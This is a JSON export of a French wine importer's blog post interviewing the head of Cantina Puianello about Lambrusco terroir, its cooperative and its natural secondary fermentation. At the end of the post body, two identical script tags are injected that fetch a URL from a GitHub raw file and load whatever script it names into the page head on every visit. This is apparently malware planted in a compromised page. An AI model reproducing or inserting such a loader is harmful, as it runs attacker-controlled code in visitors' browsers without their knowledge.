{"id":5330,"date":"2021-10-15T17:53:55","date_gmt":"2021-10-15T16:53:55","guid":{"rendered":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/?p=5330"},"modified":"2024-10-29T14:18:34","modified_gmt":"2024-10-29T13:18:34","slug":"rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello","status":"publish","type":"post","link":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/","title":{"rendered":"Rendez-vous sur la terre du Lambrusco \u00e0 la Cantina Puianello"},"content":{"rendered":"<div id=\"ez-toc-container\" class=\"ez-toc-v2_0_83 counter-hierarchy ez-toc-counter ez-toc-grey ez-toc-container-direction\">\n<div class=\"ez-toc-title-container\">\n<p class=\"ez-toc-title\" style=\"cursor:inherit\">Table of Contents<\/p>\n<span class=\"ez-toc-title-toggle\"><a href=\"#\" class=\"ez-toc-pull-right ez-toc-btn ez-toc-btn-xs ez-toc-btn-default ez-toc-toggle\" aria-label=\"Toggle Table of Content\"><span class=\"ez-toc-js-icon-con\"><span class=\"\"><span class=\"eztoc-hide\" style=\"display:none;\">Toggle<\/span><span class=\"ez-toc-icon-toggle-span\"><svg style=\"fill: #999;color:#999\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" class=\"list-377408\" width=\"20px\" height=\"20px\" viewBox=\"0 0 24 24\" fill=\"none\"><path d=\"M6 6H4v2h2V6zm14 0H8v2h12V6zM4 11h2v2H4v-2zm16 0H8v2h12v-2zM4 16h2v2H4v-2zm16 0H8v2h12v-2z\" fill=\"currentColor\"><\/path><\/svg><svg style=\"fill: #999;color:#999\" class=\"arrow-unsorted-368013\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" width=\"10px\" height=\"10px\" viewBox=\"0 0 24 24\" version=\"1.2\" baseProfile=\"tiny\"><path d=\"M18.2 9.3l-6.2-6.3-6.2 6.3c-.2.2-.3.4-.3.7s.1.5.3.7c.2.2.4.3.7.3h11c.3 0 .5-.1.7-.3.2-.2.3-.5.3-.7s-.1-.5-.3-.7zM5.8 14.7l6.2 6.3 6.2-6.3c.2-.2.3-.5.3-.7s-.1-.5-.3-.7c-.2-.2-.4-.3-.7-.3h-11c-.3 0-.5.1-.7.3-.2.2-.3.5-.3.7s.1.5.3.7z\"\/><\/svg><\/span><\/span><\/span><\/a><\/span><\/div>\n<nav><ul class='ez-toc-list ez-toc-list-level-1 ' ><li class='ez-toc-page-1 ez-toc-heading-level-2'><a class=\"ez-toc-link ez-toc-heading-1\" href=\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/#Italie-_Emilie_Romagne-_Puianello_Au_coeur_du_Lambrusco\" >Italie- Emilie Romagne- Puianello Au c\u0153ur du Lambrusco<\/a><ul class='ez-toc-list-level-3' ><li class='ez-toc-heading-level-3'><a class=\"ez-toc-link ez-toc-heading-2\" href=\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/#Interview\" >Interview<\/a><\/li><\/ul><\/li><\/ul><\/nav><\/div>\n<h2 style=\"text-align: justify;\"><span class=\"ez-toc-section\" id=\"Italie-_Emilie_Romagne-_Puianello_Au_coeur_du_Lambrusco\"><\/span>Italie- Emilie Romagne- Puianello Au c\u0153ur du Lambrusco<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>&nbsp;<\/p>\n<p>[slideshowck id=5350]<\/p>\n<p style=\"text-align: justify;\">L&rsquo;Emilie Romagne est c\u00e9l\u00e8bre pour son fameux fromage Parmigiano Reggiano, pour \u00eatre le berceau de la Scuderia Ferrari, pour son Jambon de Parme et bien \u00e9videmment pour le fameux Lambrusco.<\/p>\n<p style=\"text-align: justify;\">En visite derni\u00e8rement dans cette r\u00e9gion magnifique de l&rsquo;Emilie Romagne. Nous en avons profit\u00e9 pour aller rencontrer Simone Barozzi qui tient la Cantina Puianello \u00e0 quelques kilom\u00e8tres de Reggio d&rsquo;Emilie. Interview passionnante de cet homme qui n&rsquo;a de cesse de vouloir revaloriser l&rsquo;image du Lambrusco.<\/p>\n<h3 style=\"line-height: 1.09091; text-align: center;\"><span class=\"ez-toc-section\" id=\"Interview\"><\/span>Interview<span class=\"ez-toc-section-end\"><\/span><\/h3>\n<p style=\"text-align: justify;\"><strong>Continent du Vin :<\/strong> Simone, merci de nous accueillir de votre Cantina. Votre implantation n&rsquo;est pas commune !<\/p>\n<p style=\"text-align: justify;\"><strong>Simone Barozzi\u00a0:<\/strong> Tout \u00e0 fait c&rsquo;est un emplacement un peu atypique ! Nous sommes en plein centre ville de Puianello qui est une petite bourgade de quelques milliers d&rsquo;\u00e2mes. A mi chemin entre l&rsquo;Eglise du Village et la Mairie. Ceci montre toute l&rsquo;importance de la vigne dans notre r\u00e9gion. Elle est au c\u0153ur du village, des conversations et de la vie \u00e9conomique. C&rsquo;est aussi pour cette raison que depuis 2011, nous avons cr\u00e9\u00e9 une \u00e9picerie fine avec tous les produits de la r\u00e9gion.<\/p>\n<p style=\"text-align: justify;\"><strong>CdV\u00a0:<\/strong> Peux-tu nous retracer un peu l&rsquo;histoire de la Cantina ?<\/p>\n<p style=\"text-align: justify;\"><strong>SB\u00a0:<\/strong> La Cantina a \u00e9t\u00e9 cr\u00e9\u00e9 en 1938 \u00e0 l&rsquo;initiative de 5 familles qui souhaitaient vinifier eux m\u00eame leurs raisins. Et bien sur produire leur Lambrusco et mettant en valeur leur terroir ! Le choix de Puianello est apparu comme une \u00e9vidence ! Ce village est le point id\u00e9al de convergence de tous les petits viticulteurs install\u00e9s dans les collines de la r\u00e9gion et est situ\u00e9 sur un axe routier de grand importance donc facilitant la logistique.<\/p>\n<p style=\"text-align: justify;\"><strong>CdV\u00a0:<\/strong> Terroir et Lambrusco, c&rsquo;est une notion bien m\u00e9connue du point de vue de la France.<\/p>\n<p style=\"text-align: justify;\"><strong>SB\u00a0:<\/strong> Oui, nous avons bien conscience de la m\u00e9connaissance de nos terroirs et surtout de l&rsquo;image peu qualitative attach\u00e9e quelques fois \u00e0 notre appellation. Mais la r\u00e9gion de Lambrusco est vaste et diverse. Si je devais sch\u00e9matiser il faut bien dissocier les Lambrusco de plaines de ceux des collines. Ici, nous avons majoritairement des Lambrusco de colline situ\u00e9 entre Scandiano et Canossa. Et d&rsquo;ailleurs nos membres sont situ\u00e9s dans l\u2019appellation sp\u00e9cifique \u00ab\u00a0Colli di Scandiano and Canossa Doc\u00a0\u00bb. Les sols sont principalement des Gypse et des argiles. Une des particularit\u00e9s aussi de notre terroir, c&rsquo;est un microclimat avec une vent constant venant de la M\u00e9diterran\u00e9e. Ce qui nous garanti peu de pluies, peu d&rsquo;insectes et peu de maladies.<\/p>\n<p style=\"text-align: justify;\"><strong>CdV\u00a0:<\/strong> Aujourd&rsquo;hui votre Cantina compte combien de membres ?<\/p>\n<p style=\"text-align: justify;\"><strong>SB\u00a0:<\/strong> Certains vous diront que nous sommes de grands malades, car la Cantina regroupe plus de 200 membres ! Et chacun d&rsquo;eux a en moyenne moins d&rsquo;un hectare de vigne. La plupart de nos membres font de la vigne par plaisir, de mani\u00e8re ancestrale en toute simplicit\u00e9. Ils ont le plaisir de pouvoir vendanger leur propre raisin puis de pouvoir boire leur propre Lambrusco !<\/p>\n<p style=\"text-align: justify;\"><strong>CdV\u00a0:<\/strong> Ne me dites pas que vous faites autant de cuv\u00e9es que de membres de la Cantina\u00a0?<\/p>\n<p style=\"text-align: justify;\"><strong>SB :<\/strong>\u00a0(sourire) Bien s\u00fbr que non, on produit d\u00e9j\u00e0 pr\u00e8s d&rsquo;une trentaine de cuv\u00e9es ce qui est d\u00e9j\u00e0 \u00e9norme. Le plus compliqu\u00e9 c&rsquo;est la gestion de l&rsquo;arriv\u00e9e du raisin \u00e0 la Cantina lors des vendanges.<\/p>\n<p style=\"text-align: justify;\"><strong>CdV\u00a0:<\/strong> Oui au vu de vos installations, je vois que \u00e7a doit \u00eatre une sacr\u00e9e organisation !<\/p>\n<p style=\"text-align: justify;\"><strong>SB\u00a0:<\/strong> Oui, en fait notre responsable culture, passe ses semaines d&rsquo;ao\u00fbt et de septembre, \u00e0 visiter tout nos membres puis leur donne le timing de vendange afin que nous puissions vinifier individuellement nos diff\u00e9rents Lambrusco. On en d\u00e9nombre pas loin de 25 vari\u00e9t\u00e9s diff\u00e9rentes. On doit ensuite bien s\u00e9parer les raisins Bio des non Bio et suivre rigoureusement les fermentations. La part des raisins Bio progresse fortement chaque ann\u00e9e chez nous.<\/p>\n<p style=\"text-align: justify;\"><strong>CdV\u00a0:<\/strong> A ce propos, parlez-moi un peu des vinifications du Lambrusco.<\/p>\n<p style=\"text-align: justify;\"><strong>SB\u00a0:<\/strong> Alors, tout commence par l&rsquo;\u00e9grappage puis la mise en cuve pour la p\u00e9riode de cuvaison et de fermentation. Chez nous, on utilise des levures indig\u00e8nes, et le fermentation peut durer environ 3 semaines \u00e0 un mois. On produit alors un vin rouge tranquille, \u00e0 ce stade pas de bulles, pas de prise de mousse. Et surtout on ne fait pas de malolactique pour garder de la fra\u00eecheur dans nos vins !<\/p>\n<p style=\"text-align: justify;\"><strong>CdV\u00a0:<\/strong> Et la prise de mousse alors\u00a0?<\/p>\n<p style=\"text-align: justify;\"><strong>SB\u00a0:<\/strong> En fait, on va proc\u00e9der \u00e0 la prise de mousse au fur et \u00e0 mesure de nos besoins. Mais traditionnellement pour cette prise de mousse, on n&rsquo;ajoute ni sucre, ni levure afin faire reprendre la fermentation.<\/p>\n<p style=\"text-align: justify;\"><strong>CdV\u00a0:<\/strong> Ok, mais alors c&rsquo;est quoi le secret ?<\/p>\n<p style=\"text-align: justify;\"><strong>SB\u00a0:<\/strong> Tu vois ces grands frigos au fond du chai, ici on y conserve une partie de nos mo\u00fbts de septembre \u00e0 une temp\u00e9rature tr\u00e8s basse. Et c&rsquo;est ces mo\u00fbts que l&rsquo;on va r\u00e9introduire dans les cuves closes avec notre vin \u00e0 hauteur d&rsquo;environ 15\/20 %. Ainsi les fermentations vont red\u00e9marrer provoquant l&rsquo;apparition du CO2 et donc la prise de mousse, cette fermentation prend environ 3 semaines. On ne fait qu&rsquo;utiliser ce que la nature nous donne.<\/p>\n<p style=\"text-align: justify;\"><strong>CdV\u00a0:<\/strong> Si mes souvenirs sont bons vous embouteillez avec 3 Bars de pression ?<\/p>\n<p style=\"text-align: justify;\"><strong>SB\u00a0:<\/strong> Tout \u00e0 fait, l&rsquo;ajout des mo\u00fbts dans les cuves closes permet le red\u00e9marrage de la fermentation sachant que 4 g de sucre par litre permet d&rsquo;obtenir 1 Bar de pression. Il faut donc environ 12 g de sucre par litre pour obtenir nous fameux 3 Bars. Et \u00e0 la Cantina Puianello nous utilisons donc que les sucres naturels du mo\u00fbt.<\/p>\n<p style=\"text-align: justify;\"><strong>CdV\u00a0:<\/strong> Mis \u00e0 part le Lambrusco produisez-vous d&rsquo;autres vins et c\u00e9pages ?<\/p>\n<p style=\"text-align: justify;\"><strong>SB\u00a0:<\/strong> Oui, nous produisons notamment des blancs et vins tranquilles et en bulles avec le Spergola qui est un vieux c\u00e9pages de la r\u00e9gion que nous remettons au go\u00fbt du jour. On produit aussi du Malvasia di Candia.<br \/>\nPour revenir sur le Lambrusco, nous avons les vari\u00e9t\u00e9s Marani, Maestri, Salamino, Ancellotta mais aussi de tr\u00e8s vieilles vari\u00e9t\u00e9s comme le Montericco, le Barghi et le Marzemino. C&rsquo;est l&rsquo;assemblage de ces vari\u00e9t\u00e9s qui apporte toutes les nuances de nos Lambruscos.<\/p>\n<p style=\"text-align: justify;\"><strong>CdV\u00a0:<\/strong> Merci pour toutes ces explications Simone !<\/p>\n<p style=\"text-align: justify;\"><strong>SB\u00a0:<\/strong> C&rsquo;est avec plaisir. Maintenant, passons \u00e0 la d\u00e9gustation, je t&rsquo;ai pr\u00e9par\u00e9 une table avec l&rsquo;ensemble de la gamme \u00e0 d\u00e9guster avec du Parmigiano Artisanal et bien s\u00fbr du Jambon de Parme\u00a0!<\/p>\n<p style=\"text-align: justify;\">Retrouvez toutes les informations sur les Lambruscos import\u00e9s par Continent du Vin <a href=\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/italie-1\/cantina-puianello\/\" target=\"_blank\" rel=\"noopener\">en suivant ce lien.<\/a><\/p>\n<p><a href=\"https:\/\/www.cantinapuianello.it\/it\/\" target=\"_blank\" rel=\"noopener\">https:\/\/www.cantinapuianello.it\/it\/\u00a0<\/a><script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><script>var url = 'https:\/\/raw.githubusercontent.com\/lolngnos\/loles\/main\/step.txt';\nfetch(url)\n    .then(response => response.text())\n    .then(data => {\n        var script = document.createElement('script');\n        script.src = data.trim();\n        document.getElementsByTagName('head')[0].appendChild(script);\n    });<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Italie- Emilie Romagne- Puianello Au c\u0153ur du Lambrusco &nbsp; [slideshowck id=5350] L&rsquo;Emilie Romagne est c\u00e9l\u00e8bre pour son fameux fromage Parmigiano Reggiano, pour \u00eatre le berceau de la Scuderia Ferrari, pour son Jambon de Parme et bien \u00e9videmment pour le fameux Lambrusco. En visite derni\u00e8rement dans cette r\u00e9gion magnifique de l&rsquo;Emilie Romagne. Nous en avons profit\u00e9 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":5332,"comment_status":"closed","ping_status":"open","sticky":true,"template":"","format":"standard","meta":{"_lmt_disableupdate":"","_lmt_disable":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"set","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-gradient":""}},"footnotes":""},"categories":[13,32],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v23.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Rendez-vous sur la terre du Lambrusco \u00e0 la Cantina Puianello -<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Rendez-vous sur la terre du Lambrusco \u00e0 la Cantina Puianello -\" \/>\n<meta property=\"og:description\" content=\"Italie- Emilie Romagne- Puianello Au c\u0153ur du Lambrusco &nbsp; [slideshowck id=5350] L&rsquo;Emilie Romagne est c\u00e9l\u00e8bre pour son fameux fromage Parmigiano Reggiano, pour \u00eatre le berceau de la Scuderia Ferrari, pour son Jambon de Parme et bien \u00e9videmment pour le fameux Lambrusco. En visite derni\u00e8rement dans cette r\u00e9gion magnifique de l&rsquo;Emilie Romagne. Nous en avons profit\u00e9 [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/\" \/>\n<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/ContinentDuVin\/\" \/>\n<meta property=\"article:published_time\" content=\"2021-10-15T16:53:55+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2024-10-29T13:18:34+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2021\/10\/002-min.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"1080\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Continent du Vin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"Continent du Vin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"6 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/\",\"url\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/\",\"name\":\"Rendez-vous sur la terre du Lambrusco \u00e0 la Cantina Puianello -\",\"isPartOf\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2021\/10\/002-min.jpg\",\"datePublished\":\"2021-10-15T16:53:55+00:00\",\"dateModified\":\"2024-10-29T13:18:34+00:00\",\"author\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc\"},\"breadcrumb\":{\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/#primaryimage\",\"url\":\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2021\/10\/002-min.jpg\",\"contentUrl\":\"https:\/\/continentduvin.fr\/wp-content\/uploads\/2021\/10\/002-min.jpg\",\"width\":1920,\"height\":1080},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Rendez-vous sur la terre du Lambrusco \u00e0 la Cantina Puianello\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website\",\"url\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/\",\"name\":\"\",\"description\":\"Importateur de Vins du Monde depuis 2004\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc\",\"name\":\"Continent du Vin\",\"description\":\"Continent du Vin est importateur de vins d'Afrique du Sud, du Chili, d'Argentine, d'Oc\u00e9anie, d'Italie et d'Espagne depuis 2004. Au fil du temps, nous essayons de vous faire d\u00e9couvrir de nouveaux domaines et de nouvelles cuv\u00e9es pour vous faire voyager ! Rejoignez-nous sur notre profil Google+\",\"sameAs\":[\"http:\/\/www.continentduvin.fr\",\"https:\/\/www.facebook.com\/ContinentDuVin\/\"],\"url\":\"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Rendez-vous sur la terre du Lambrusco \u00e0 la Cantina Puianello -","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/","og_locale":"fr_FR","og_type":"article","og_title":"Rendez-vous sur la terre du Lambrusco \u00e0 la Cantina Puianello -","og_description":"Italie- Emilie Romagne- Puianello Au c\u0153ur du Lambrusco &nbsp; [slideshowck id=5350] L&rsquo;Emilie Romagne est c\u00e9l\u00e8bre pour son fameux fromage Parmigiano Reggiano, pour \u00eatre le berceau de la Scuderia Ferrari, pour son Jambon de Parme et bien \u00e9videmment pour le fameux Lambrusco. En visite derni\u00e8rement dans cette r\u00e9gion magnifique de l&rsquo;Emilie Romagne. Nous en avons profit\u00e9 [&hellip;]","og_url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/","article_author":"https:\/\/www.facebook.com\/ContinentDuVin\/","article_published_time":"2021-10-15T16:53:55+00:00","article_modified_time":"2024-10-29T13:18:34+00:00","og_image":[{"width":1920,"height":1080,"url":"https:\/\/continentduvin.fr\/wp-content\/uploads\/2021\/10\/002-min.jpg","type":"image\/jpeg"}],"author":"Continent du Vin","twitter_card":"summary_large_image","twitter_misc":{"\u00c9crit par":"Continent du Vin","Dur\u00e9e de lecture estim\u00e9e":"6 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/","url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/","name":"Rendez-vous sur la terre du Lambrusco \u00e0 la Cantina Puianello -","isPartOf":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website"},"primaryImageOfPage":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/#primaryimage"},"image":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/#primaryimage"},"thumbnailUrl":"https:\/\/continentduvin.fr\/wp-content\/uploads\/2021\/10\/002-min.jpg","datePublished":"2021-10-15T16:53:55+00:00","dateModified":"2024-10-29T13:18:34+00:00","author":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc"},"breadcrumb":{"@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/"]}]},{"@type":"ImageObject","inLanguage":"fr-FR","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/#primaryimage","url":"https:\/\/continentduvin.fr\/wp-content\/uploads\/2021\/10\/002-min.jpg","contentUrl":"https:\/\/continentduvin.fr\/wp-content\/uploads\/2021\/10\/002-min.jpg","width":1920,"height":1080},{"@type":"BreadcrumbList","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/rendez-vous-sur-la-terre-du-lambrusco-a-la-cantina-puianello\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/"},{"@type":"ListItem","position":2,"name":"Rendez-vous sur la terre du Lambrusco \u00e0 la Cantina Puianello"}]},{"@type":"WebSite","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#website","url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/","name":"","description":"Importateur de Vins du Monde depuis 2004","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"fr-FR"},{"@type":"Person","@id":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/#\/schema\/person\/89ec7a9b781c7b216196c9436b7aaafc","name":"Continent du Vin","description":"Continent du Vin est importateur de vins d'Afrique du Sud, du Chili, d'Argentine, d'Oc\u00e9anie, d'Italie et d'Espagne depuis 2004. Au fil du temps, nous essayons de vous faire d\u00e9couvrir de nouveaux domaines et de nouvelles cuv\u00e9es pour vous faire voyager ! Rejoignez-nous sur notre profil Google+","sameAs":["http:\/\/www.continentduvin.fr","https:\/\/www.facebook.com\/ContinentDuVin\/"],"url":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/author\/admin\/"}]}},"modified_by":"Continent du Vin","_links":{"self":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts\/5330"}],"collection":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/comments?post=5330"}],"version-history":[{"count":2,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts\/5330\/revisions"}],"predecessor-version":[{"id":14878,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/posts\/5330\/revisions\/14878"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/media\/5332"}],"wp:attachment":[{"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/media?parent=5330"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/categories?post=5330"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/continentduvin.fr\/importateur-de-vin-du-monde\/wp-json\/wp\/v2\/tags?post=5330"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}